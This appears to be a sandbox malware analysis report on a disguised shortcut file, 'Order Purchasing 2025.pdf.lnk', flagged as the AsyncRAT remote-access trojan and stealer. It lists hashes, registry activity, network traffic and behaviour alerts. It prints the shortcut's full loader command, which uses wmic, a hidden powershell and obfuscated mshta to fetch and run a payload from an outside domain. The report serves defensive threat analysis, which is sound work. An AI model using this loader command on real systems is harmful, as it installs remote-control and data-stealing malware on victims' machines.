File name:	Order Purchasing 2025.pdf.lnk
Full analysis:	https://app.any.run/tasks/60bc081f-ab78-4f91-ba71-2772ab79f927
Verdict:	Malicious activity
Threats:	AsyncRAT is a RAT that can monitor and remotely control infected systems. This malware was introduced on Github as a legitimate open-source remote administration software, but hackers use it for its many powerful malicious functions. Remote access trojans (RATs) are a type of malware that enables attackers to establish complete to partial control over infected computers. Such malicious programs often have a modular design, offering a wide range of functionalities for conducting illicit activities on compromised systems. Some of the most common features of RATs include access to the users’ data, webcam, and keystrokes. This malware is often distributed through phishing emails and links. Stealers are a group of malicious software that are intended for gaining unauthorized access to users’ information and transferring it to the attacker. The stealer malware category includes various types of programs that focus on their particular kind of data, including files, passwords, and cryptocurrency. Stealers are capable of spying on their targets by recording their keystrokes and taking screenshots. This type of malware is primarily distributed as part of phishing campaigns. Malware Trends Tracker >>>
Analysis date:	January 05, 2025, 20:04:51
OS:	Windows 10 Professional (build: 19045, 64 bit)
Tags:	rat asyncrat remote stealer
Indicators:
MIME:	application/x-ms-shortcut
File info:	MS Windows shortcut, Item id list present, Has Relative path, Has command line arguments, Icon number=11, Unicoded, HasExpIcon "%ProgramFiles%\Microsoft\Edge\Application\msedge.exe" KnownFolderID 1AC14E77-02E7-4E5D-B744-2EB1AE5198B7, length=0, window=showminnoactive, IDListSize 0x0187, Root folder "20D04FE0-3AEA-1069-A2D8-08002B30309D", Volume "C:\"
MD5:	09ED1E6FCA4128CD63C7665724B23001
SHA1:	D6C4EFFA6CCA4BE41D791979ADFE72A3EDAEDB02
SHA256:	8FAEF311E0849D71AF555BB55FA2EC2758D7612FED226F36A8B1841733A3CC58
SSDEEP:	24:8N8PZsx/Tff2lgKaKNEeH+/3QkWNdk6ZocWqddS9dbEQW/gK:87TXCiQEeAQldkUFdo9aQ4g

Flags:	IDList, RelativePath, CommandArgs, IconFile, Unicode, ExpIcon
FileAttributes:	(none)
TargetFileSize:	-
IconIndex:	11
RunWindow:	Show Minimized No Activate
HotKey:	(none)
TargetFileDOSName:	wmic.exe
RelativePath:	..\..\..\Windows\System32\Wbem\wmic.exe
CommandLineArguments:	process call create "powershell -w 1 powershell -Command ('ms' + 'hta' + '.exe ' + 'https://chinawoddon.co/poo')"
IconFileName:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe


(PID) Process:	(6712) mshta.exe	Key:	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content
Operation:	write	Name:	CachePrefix
Value:
(PID) Process:	(6712) mshta.exe	Key:	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies
Operation:	write	Name:	CachePrefix
Value: Cookie:
(PID) Process:	(6712) mshta.exe	Key:	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History
Operation:	write	Name:	CachePrefix
Value: Visited:
(PID) Process:	(4136) Acrobat.exe	Key:	HKEY_CURRENT_USER\SOFTWARE\Adobe\Adobe Acrobat\DC\ExitSection
Operation:	write	Name:	bLastExitNormal
Value: 0
(PID) Process:	(7164) powershell.exe	Key:	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.pdf\OpenWithProgids
Operation:	write	Name:	Acrobat.Document.DC
Value:
(PID) Process:	(2088) Acrobat.exe	Key:	HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Mappings\S-1-15-2-2034283098-2252572593-1072577386-2659511007-3245387615-27016815-3920691934
Operation:	write	Name:	DisplayName
Value: Adobe Acrobat Reader Protected Mode
(PID) Process:	(4136) Acrobat.exe	Key:	HKEY_CURRENT_USER\SOFTWARE\Adobe\Adobe Acrobat\DC\AVEntitlement
Operation:	write	Name:	sProductGUID
Value: 4143524F5F5245534944554500
(PID) Process:	(4136) Acrobat.exe	Key:	HKEY_CURRENT_USER\SOFTWARE\Adobe\Adobe Acrobat\DC\AVEntitlement
Operation:	write	Name:	bSynchronizeOPL
Value: 0
(PID) Process:	(4136) Acrobat.exe	Key:	HKEY_CURRENT_USER\SOFTWARE\Adobe\Adobe Acrobat\DC\AVGeneral
Operation:	write	Name:	uLastAppLaunchTimeStamp
Value: 940726416
(PID) Process:	(4136) Acrobat.exe	Key:	HKEY_CURRENT_USER\SOFTWARE\Adobe\Adobe Acrobat\DC\AVGeneral
Operation:	write	Name:	iNumAcrobatLaunches
Value: 7

PID	Process	Filename		Type
6344	powershell.exe	C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_lovxs1kt.ift.psm1		text
		MD5:D17FE0A3F47BE24A6453E9EF58C94641	SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
6712	mshta.exe	C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B2FAF7692FD9FFBD64EDE317E42334BA_D7393C8F62BDE4D4CB606228BC7A711E		binary
		MD5:EB6C6F8B309870589593548E90218E01	SHA256:D4F3BA02372728E6C1ED9D59D2BDB385D2A07DE25109FE0A9452720F9DB1C4DE
6616	powershell.exe	C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_scmpvqom.315.ps1		text
		MD5:D17FE0A3F47BE24A6453E9EF58C94641	SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
6712	mshta.exe	C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\C2C5FBE3D8BFECB0F120CDF441E727EF		binary
		MD5:E49BC086B6D5F93FD7C8559A1BB36D0B	SHA256:50E0C68BC31A7B69F2264CC9915FDBAC8C06322F90FAA7A3ECDE399CC285333A
6616	powershell.exe	C:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive		binary
		MD5:1BA5270DC4B0BD1A4368C2689F139FB2	SHA256:0E7129BC14B737BCD18203FAE3059E8F3F5B57C627DDFAF0F687B3F30F3D00E2
6712	mshta.exe	C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\07CEF2F654E3ED6050FFC9B6EB844250_3431D4C539FB2CFCB781821E9902850D		binary
		MD5:C10A730C4502B68329D6659FC70C534D	SHA256:24F0C0FE08B9002A3DDA2990921D6FC6CB058ACCCAE70D013E9641B49439BD64
6344	powershell.exe	C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_wdtfxbkx.ypo.ps1		text
		MD5:D17FE0A3F47BE24A6453E9EF58C94641	SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
6616	powershell.exe	C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_0ceidnvv.oyq.psm1		text
		MD5:D17FE0A3F47BE24A6453E9EF58C94641	SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
6712	mshta.exe	C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B2FAF7692FD9FFBD64EDE317E42334BA_D7393C8F62BDE4D4CB606228BC7A711E		binary
		MD5:665F6B487B9D55A0292CB77CD5C797DF	SHA256:EADBEF8DE4207DEEB94528ED28C7427F9EE97776B384EC3C1C4B47B8DA7366C7
6712	mshta.exe	C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C2C5FBE3D8BFECB0F120CDF441E727EF		binary
		MD5:5C35CBF6B36CD4D72C407233C14149CF	SHA256:D677F70E5F1B52EEE43FC4921402C4DCA307DC57E3DCDFA78933568B8E5AC765

PID	Process	Method	HTTP Code	IP	URL	CN	Type	Size	Reputation
—	—	GET	200	192.229.221.95:80	http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTrjrydRyt%2BApF3GSPypfHBxR5XtQQUs9tIpPmhxdiuNkHMEWNpYim8S8YCEAI5PUjXAkJafLQcAAsO18o%3D	unknown	—	—	whitelisted
1176	svchost.exe	GET	200	192.229.221.95:80	http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D	unknown	—	—	whitelisted
6712	mshta.exe	GET	200	172.64.149.23:80	http://ocsp.usertrust.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTNMNJMNDqCqx8FcBWK16EHdimS6QQUU3m%2FWqorSs9UgOHYm8Cd8rIDZssCEH1bUSa0droR23QWC7xTDac%3D	unknown	—	—	whitelisted
6712	mshta.exe	GET	200	104.18.38.233:80	http://ocsp.comodoca.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBRTtU9uFqgVGHhJwXZyWCNXmVR5ngQUoBEKIz6W8Qfs4q8p74Klf9AwpLQCEDlyRDr5IrdR19NsEN0xNZU%3D	unknown	—	—	whitelisted
6216	backgroundTaskHost.exe	GET	200	192.229.221.95:80	http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEAUZZSZEml49Gjh0j13P68w%3D	unknown	—	—	whitelisted
2356	SIHClient.exe	GET	200	95.101.149.131:80	http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl	unknown	—	—	whitelisted
2356	SIHClient.exe	GET	200	95.101.149.131:80	http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl	unknown	—	—	whitelisted
2088	Acrobat.exe	GET	200	192.229.221.95:80	http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAbY2QTVWENG9oovp1QifsQ%3D	unknown	—	—	whitelisted
2164	svchost.exe	GET	200	23.48.23.173:80	http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl	unknown	—	—	whitelisted
6712	mshta.exe	GET	200	104.18.38.233:80	http://ocsp.sectigo.com/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBRDC9IOTxN6GmyRjyTl2n4yTUczyAQUjYxexFStiuF36Zv5mwXhuAGNYeECEQCDIiD%2FYUK4qPEIgSWrZw77	unknown	—	—	whitelisted

PID	Process	IP	Domain	ASN	CN	Reputation
4712	MoUsoCoreWorker.exe	51.104.136.2:443	settings-win.data.microsoft.com	MICROSOFT-CORP-MSN-AS-BLOCK	IE	whitelisted
—	—	192.168.100.255:137	—	—	—	whitelisted
2164	svchost.exe	51.104.136.2:443	settings-win.data.microsoft.com	MICROSOFT-CORP-MSN-AS-BLOCK	IE	whitelisted
6076	RUXIMICS.exe	51.104.136.2:443	settings-win.data.microsoft.com	MICROSOFT-CORP-MSN-AS-BLOCK	IE	whitelisted
4	System	192.168.100.255:138	—	—	—	whitelisted
5064	SearchApp.exe	104.126.37.171:443	www.bing.com	Akamai International B.V.	DE	whitelisted
—	—	192.229.221.95:80	ocsp.digicert.com	EDGECAST	US	whitelisted
1176	svchost.exe	20.190.159.23:443	login.live.com	MICROSOFT-CORP-MSN-AS-BLOCK	IE	whitelisted
1176	svchost.exe	192.229.221.95:80	ocsp.digicert.com	EDGECAST	US	whitelisted
1076	svchost.exe	23.35.238.131:443	go.microsoft.com	AKAMAI-AS	DE	whitelisted

Domain	IP	Reputation
settings-win.data.microsoft.com	51.104.136.2 20.73.194.208 40.127.240.158	whitelisted
google.com	142.250.185.174	whitelisted
www.bing.com	104.126.37.171 104.126.37.163 104.126.37.153 104.126.37.186 104.126.37.177 104.126.37.136 104.126.37.178 104.126.37.176 104.126.37.123	whitelisted
ocsp.digicert.com	192.229.221.95	whitelisted
login.live.com	20.190.159.23 20.190.159.4 40.126.31.67 20.190.159.0 40.126.31.69 20.190.159.68 20.190.159.71 20.190.159.75	whitelisted
go.microsoft.com	23.35.238.131	whitelisted
chinawoddon.co	66.29.132.84	unknown
ocsp.comodoca.com	104.18.38.233 172.64.149.23	whitelisted
ocsp.usertrust.com	172.64.149.23 104.18.38.233	unknown
ocsp.sectigo.com	104.18.38.233 172.64.149.23	whitelisted

PID	Process	Class	Message
6856	BtowsPlayer.exe	Domain Observed Used for C2 Detected	ET MALWARE Generic AsyncRAT Style SSL Cert
6856	BtowsPlayer.exe	Malware Command and Control Activity Detected	REMOTE [ANY.RUN] AsyncRAT Successful Connection

General Info

Order Purchasing 2025.pdf.lnk

09ED1E6FCA4128CD63C7665724B23001

D6C4EFFA6CCA4BE41D791979ADFE72A3EDAEDB02

8FAEF311E0849D71AF555BB55FA2EC2758D7612FED226F36A8B1841733A3CC58

24:8N8PZsx/Tff2lgKaKNEeH+/3QkWNdk6ZocWqddS9dbEQW/gK:87TXCiQEeAQldkUFdo9aQ4g

Software environment set and analysis options

Launch configuration

Software preset

Hotfixes

Behavior activities

MALICIOUS

Run PowerShell with an invisible window

Uses AES cipher (POWERSHELL)

Changes powershell execution policy (Unrestricted)

Gets or sets the initialization vector for the symmetric algorithm (POWERSHELL)

Downloads the requested resource (POWERSHELL)

Executing a file with an untrusted certificate

Create files in the Startup directory

Antivirus name has been found in the command line (generic signature)

ASYNCRAT has been detected (SURICATA)

Actions looks like stealing of personal data

Gets or sets the symmetric key that is used for encryption and decryption (POWERSHELL)

SUSPICIOUS

Executed via WMI

Application launched itself

Starts POWERSHELL.EXE for commands execution

Probably obfuscated PowerShell command line is found

The process bypasses the loading of PowerShell profile settings

Executable content was dropped or overwritten

Reads the Windows owner or organization settings

Reads security settings of Internet Explorer

Starts CMD.EXE for commands execution

Uses TIMEOUT.EXE to delay execution

Get information on the list of running processes

Contacting a server suspected of hosting an CnC

Connects to unusual port

Executes script without checking the security policy

Cryptography encrypted command line is found

Process drops legitimate windows executable

INFO

Reads security settings of Internet Explorer

The process uses the downloaded file

Checks proxy server information

Reads Internet Explorer settings

Gets data length (POWERSHELL)

Checks whether the specified file exists (POWERSHELL)

Application launched itself

Disables trace logs

Sends debugging messages

The executable file from the user directory is run by the Powershell process

Checks supported languages

Create files in a temporary directory

Reads the computer name

Process checks computer location settings

Creates files or folders in the user directory

Reads the machine GUID from the registry

Reads the software policy settings

The sample compiled with english language support

Malware configuration

Static information

TRiD

EXIF

LNK

Video and screenshots

Processes

Behavior graph

Specs description

Process information

Information

Modules

Information

Modules

Information

Modules

Information

Modules

Information

Modules

Information